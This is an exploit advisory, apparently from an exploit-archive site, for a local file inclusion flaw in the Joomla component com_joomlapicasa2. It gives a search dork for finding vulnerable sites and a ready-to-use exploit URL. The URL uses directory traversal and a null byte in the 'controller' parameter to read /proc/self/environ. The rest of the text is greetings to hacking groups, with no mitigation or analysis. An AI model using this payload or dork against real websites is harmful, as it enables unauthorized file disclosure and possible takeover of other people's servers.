id: 14377
date: 10/08/2010
title: Joomla Component com_joomlapicasa2 LFI Vulnerability
author: jos_ali_joe
cves: 

====================================================
Joomla Component com_joomlapicasa2 LFI Vulnerability
====================================================

[+] Author    : jos_ali_joe
[+] Homepage  : http://josalijoe.org/  &  http://indonesiancoder.com/
[+] Mail      : josalijoe[at]yahoo[dot]com
[+] Date      : oktober 07,2010
[+] Vendor    : N/A
[+] Dork      : inurl:index.php?option="com_joomlapicasa2"

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00

---------------------------------------------------------------------------

Thanks :

./kaMtiEz – ibl13Z – Xrobot – tukulesto – N4ck0 – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha

./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Aury – aphe-aphe - Alecs

./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku – TeRRenJr

Greets For :

./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker

My Team : ./Indonesian Coder



#  0day.today [2023-03-27]  #